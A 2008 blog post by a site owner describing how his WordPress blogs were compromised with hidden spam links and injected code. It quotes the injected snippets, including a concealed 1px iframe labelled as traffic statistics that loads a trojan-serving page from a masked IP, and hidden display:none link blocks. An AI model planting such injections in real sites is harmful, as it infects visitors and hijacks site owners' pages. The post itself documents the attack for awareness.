My Wordpress Hacked with Hidden Spam Injection

Hits for this post:2927 | Popularity: 29%
Written by pramudita.anindita.ptd — published on May 12th, 2008 |   

Three of my Wordpress blog hacked, that blogs installed on 2 different servers. I was hit by the spam injection. Spammer(s) injected long hidden links (hundreds of lines!) in blog posts and footer of my HYIP blog for revenue sharing site. Spammer(s) are also inserting iframes in blog posts of my other multi register users blog. That spammer(s) hacked this blog too with inject(s) hidden link of common spam words into footer only ( people can't register at this blog).

Blogs are most likely attacked by some kind of automated tool since the amounts of spam are too big to work manually on all those spam pages creation.

Hidden Text Injection : The insertion was done deliberately to hide the text from display as follows (Injected into blog posts from one of my multi users blog):

PLAIN TEXT
CODE:
  1. <font style="overflow: hidden; position: absolute; height: 0pt; width: 0pt">
  2. Spam words with link to spam websites
  3. </font>

Iframe Injection : my other multi register users blog injected with a 1px iframe due to a vulnerability in WordPress ... looks like this :

PLAIN TEXT
CODE:
  1. <!-- Traffic Statistics --> <iframe width="1" height="1" frameborder="0" src="http://xx.xxx.xx.xx/iframe/wp-stats.php"> </iframe><!-- End Traffic Statistics -->

and of course it downloads a trojan. Its happening to a TON of blogs too.

Template Injection : Not only did the hackers insert “invisible” code into my blog posts, what had happened was my template had been hacked so that the footer had included a ton of hidden spam terms.
Number of paragraphs: 1
Number of words: 115,520
Number of letters and digits: 468,439
Number of characters: 595,969
File size: 628,009 bytes

Look like this :

PLAIN TEXT
CODE:
  1. <!-- ~ --><u style="display: none"> <a href="http://spammerdomain.ext/spampage.html">ton of spam terms </a> </u><!-- ~ -->

from lower credit card to porn credit card, from buy cheap car insurance to unreal auto car insurance :p

Now, I'm trying to get more information and solve this problem and trying to find the answers for these questions :

Why would someone want to hack my website?
What should I do to detect and eventually block hacking attempts?
What kinds of hackery going on?
How to Prevent SQL Injection Attacks?
How To Repair The Damage?
Search Engine Effects of This Situation
Etc.
I'll be back soon !

Update :

Google temporarily removed some of my webpages from their search results. Currently pages from blog.pramudita.com are scheduled to be removed for at least 30 days. This blog hacked too. Spam terms inserted into footer.php of current theme and user : "wordpress" registered into that blog, also he changed these files :

  1. index.php
  2. xmlrpc.php
  3. wp-trackback.php and
  4. wp-settings.php
Top incoming search terms for this post
    Latest Post From Each Category

    This entry was posted on Monday, May 12th, 2008 at 5:08 pm and is filed under WordPress. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site. .

    No Responses to “My Wordpress Hacked with Hidden Spam Injection”


    Top 5 Commenters at Our Blog
    1. kissdol: 6
    2. Wetsaidenddibs: 5
    3. mopeglongenlyc: 3
    4. Occuttrogz: 2
    5. unagmedgendt: 2

    You can subscribe to the RSS feed for comments on this post. You can also reply to this post directly in your weblog, and take advantage of the TrackBack URI to record your reply in this post.

    1. No comments posted yet

    Leave a comment

    Line and paragraph breaks automatic, e-mail address never displayed, HTML allowed: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong>


    Verification Image

    Please type the letters you see in the picture.

     - 

    Money & Investment

    • Current TOP HYIPs - May 2008
      Here are current top performance HYIP, goldpoll version : 1) Large Sum lifetime: 866 days monitoring: 474 days admin rate: 4 user rate: 253.5 funds return: 417.40% 2) Golden Path Invest lifetime: 435 days monitoring: 403 days admin rate: 4 user rate: 94.7 funds return: 286.00% 3) 4 FX Trader lifetime: 701 days monitoring: 148 days admin rate: 3 user rate: 114.6 funds return: 225.00% 4) Alco Holding […]
    • Earn 1$ with 15 min per day-that cool!
      “This is to show you how simple it is to earn money using internet spending only 15 minutes per day“. Just see the sites listed below and the minimum payout(You can request payment once your earnings reach this value!) Please note that there are many such websites and I am giving the best of them so that […]
    • SAInvestment Scam Fraud Alert
      I read SAInvestment Investigation at HYIP - Expert’s Blog. I agree that SAInvestment address is often utilized by scammers. I found that address used by these programs too. Here they are : PWW4YOU Domain Name: PWW4YOU.COM Registrant: Virtus Offshore Investment Co. Virtus Offshore Investment Co. ********@voichaven.com) Suite 2007 20th Floor The Century Tower Ave Ricardo J. Alfaro Panama City Panama,- PA Tel. 603.91541210 Creation Date: 26-Oct-2006 Expiration Date: […]
    • Latest News of FFG Trading
      Here are latest news from FFG Trading. FFG Trading Online since February 23, 2008 Mar 04, 2008, 12:08 FFG Trading Under DDoS Attack, they website experienced continuous DDoS attacks Mar 26, 2008 Problem with DNS servers, website inaccessible. ffg-trading.com has been suspended by the domain registration authority due to a number of complaints that their domain name involved […]
    • Invesco Trade - Latest News
      Investors asking latest news about Invesco Trade who made a claim “have been working several years in research department of big brokerage company”. This question emerged when they were not accept payment from Invesco Trade. So what is was on with Invesco Trade ? The answer is : Invesco Trade scam and gone. They were lier, what […]

    Black Listed & Scam Program

    • 4FxTraders
      4FxTraders was scam !. Here is some information about 4FxTraders. Please stay away from 4FxTraders. Program Plan of 4FxTraders payouts: 110-130% after 1 day or 125-165% after 2 days! min deposit: $1 max deposit: $25,000 referral bonus: 5% lifetime: 10 days monitoring: 13 days Account Information Total accounts     1496 Total deposited     $ 8,964.57 Total withdraw    $ 2,022.87 Program Description Our amazing program has been set up with […]
    • MInvestment
      MInvestment scam and gone. This HYIP is one of most current popular HYIP, working since 2000 (claimed). A few investment plans with daily payouts from 1,4% to 2,3% percent and VIP offers. They have professional phone, live chat and email support. Multilingual site and operating your funds professionally with guaranteed income. Also MInvestment Scam Is […]
    • Open Trade
      Open Trade International, Inc.  They claimed as company which investsed money in Forex market, their program website Investment Plan : Promotional * $20 - 50 1.00% […]
    • MICROSOFT-SOFTWARE LOTTERY
      Beware ! Stay away from fraud email like this : CONGRATULATIONS! YOUR EMAIL ACCOUNT / ADDRESS HAS WON. FROM: PROMOTIONS DEPARTMENT OF MICRONET SOFTWARE LOTTERY INTER., WINNING NOTICE FOR CATEGORY “A” WINNER. REF. NO: LSLUK/2031/8161/07. BATCH NUMBER: 14/011/IPD. Attention: Dear Winner , MICROSOFT-SOFTWARE LOTTERY International has just concluded its final draws of it’s periodical promotional program on November 26th, 2007 by […]
    • Aliativa
      Aliativa is not paid since 31/10/2007. I send few letters to support but not have answer this program SCAM ! Program Description Aliativa is a leading global investment manager that provide financial expertise both to the companies, and private investors worldwide. Bla..bla…blah. Aliativa Investment Plan Light : 1.0% Daily, 10$-3000$ for 240 days Standard : 1.4% Daily 3000$-10000$ for […]

    Blog & WordPress

    • Installing Multiple Blogs for Multiple Users
      I have been planning to install multiple blog for multiple bloggers on my network. Now I confuse which project shall I choose. There are lot of wordpress projects. Alternative projects and plugins which provide some level of multi-blogging facility are : Lyceum Developed by ibiblio.org, Lyceum is a stand-alone multi-user multi-blogging application designed to handle 2 to […]
    • Error When Saving Posts - on Line 294
      Access denied for user ‘username’@’localhost’ (using password: NO) on line: 294. I get that error every time I save a post on new post or edit post. I confused with this error and didn’t know how to solve this. So I asked to Google and found this thread : Error When Saving Posts That thread solved […]
    • Looking for Best RSS Aggregator or Feed Syndication Plugin
      I’m looking for best plugin for my network blog (Pramudita’s Network). I need a RSS aggregator/Feed Syndication which can generate content from my other feeds. Yes, auto content generator which take content from all of my blog feeds. Let’s try to find that plugin. First I try to find this plugin at : WordPress Plugin Database. Found […]
    • Best Social Bookmarking Sites
      Social Bookmarking is very important in promoting our businesses, our web sites and our blogs. Marketers can use social bookmarks to allow visitors to share their content. Here are list of best social bookmarking sites, updated June 2007 Page Rank 9: http://www.netscape.com/ | Alexa: 504 Page Rank 8: http://digg.com/ | Alexa: 80 http://del.icio.us/ | Alexa: 159 http://www.fark.com/ | Alexa: […]
    • WordPress 2.1.1 Was Highly Exploitable Code
      If you downloaded WordPress 2.1.1 within the past 3-4 days, your files may include a security exploit that was added by a cracker. Read more here

    Energy and Fuel

    • How to Make Biodiesel
      Last week I tried to learn how to make biodiesel (a substitute for petroleum diesel that can be made from plant & animal sourced oils), home made biodiesel. How do I make my own Biodiesel processor? I want to make my own biodiesel processor to make diesel fuel out of used vegetable oil. Will biodiesel be […]
    • How to Make Home Biogas System
      Biogas is usually produced using biogenic material or agricultural waste materials, such as otherwise unusable parts of plants and manure. One type of biogas is produced by anaerobic digestion or fermentation of biodegradable materials such as biomass, manure or sewage, municipal waste, and energy crops. Biogas can also be produced by separating organic materials from […]
    • Home Made Solar Water Heater
      I read related information of water fuel for car, now I interest with makings process of a solar water distiller and solar water heater. Both concerning hand in glove with heat (the sun), then as my first phase I will look for making solar water heater, yes homemade solar water heater or Do It Your self […]
    • Hello Energizer
      Expensive petroleum price and growing climate earth’s heat, growing amount of sunlight reaching the Earth has triggered human creativity in finding and optimize utilization nature energy as the source of energy. This blog makes as place to collect related information about energy (solar energy, wind energy, water energy, renewable energy, fossil fuels and many other things) […]

    My Sister’s Celebrities Gossip

    • Lindsay Lohan in Troubles
      Lindsay Lohan is another celebrity that got into troubles. Lindsay Lohan has been accused of stealing a £5,000 fur coat from Marsha Markova partying at the same club. Marsha Markova, an artist and socialite, was wearing the shockingly expensive dead animal pelts to a friend’s birthday party — a party that was also attended by Lohan. […]
    • Heidi Montag in Maxim February 2008
      MTV’s ‘The Hills’ Heidi Montag is featured in the latest issue of Maxim. Heidi Montag just a small-town girl from Colorado making it big on the blogs and getting the Maxim cover she’s dreamed of ever since the boys in high school called her a surfboard. It must be so awesome to be her! This Maxim […]
    • Heidi Montag and Spencer’s Candid Photos
      The latest Hollywood couple to hit the South-of-the-border beaches is none other than the on-again-off-again Hills couple Heidi Montag and Spencer Pratt. Photographers captured some lovely preplanned “candid” moments of Heidi and her boyfriend, Spencer Pratt, were up to their usual shenanigans in Baja Mexico on Tuesday. Here are some Heidi Montag’s pictures celebrity couples, celebrity gossip […]
    • Winslet To Replace Kidman In The Reader
      Kate Winslet will replace the pregnant Nicole Kidman in the upcoming romantic drama The Reader.  A Babelsberg spokesman confirmed that production would begin this month. Bernhard Schlink told the Berliner Morgenpost in an article to be published tomorrow that Winslet would take on the starring role of the mysterious older woman who seduces a young man […]
    • Kim Kardashian Nude In Playboy
      Kim Kardashian has been selected as the December 2007 Playboy Magazine cover. Kim Kardashian has reportedly shot a Hype Williams directed nude spread to appear in an upcoming issue of Playboy Magazine. Kim’s body is mostly draped in sheets and jewelry, the source says that Kardashian “will show one boob, and her bare butt.” Looking for Kim […]

    Recent Posts

    Popular Post

  • Free 2008 Calendar Read 7243 times.
  • Kim Kardashian Photos Read 6190 times.
  • Another Rapidshare Download Tools Read 5131 times.
  • How to Bypass Rapidshare Waiting Time Read 4698 times.
  • How to Bypass Megaupload Country Limit Read 4019 times.
  • How to Install Universal Share Downloader Read 3994 times.
  • List of Best Spyware, Adware, and Malware Removers Read 3906 times.
  • LCD-DTV221 XBR From I-O Data Read 3552 times.
  • Microsoft-Software Lottery Read 3162 times.
  • Buying Christmas Trees Online Read 3075 times.

    • Top Movers

    Pramudita’s Network template redesign by Pramudita and uses WordPress.
    This Web site may require a highly standards compliant Web browser. Tested on Mozilla, Firefox, Konqueror and Microsoft Internet Explorer 7.
    Subscribe to this site's Entries (RSS) or Comments (RSS).

    This page is a printout of part of Pramudita’s Network.
    URL of this printout: http://www.pramudita.com/my-wordpress-hacked-with-hidden-spam-injection.html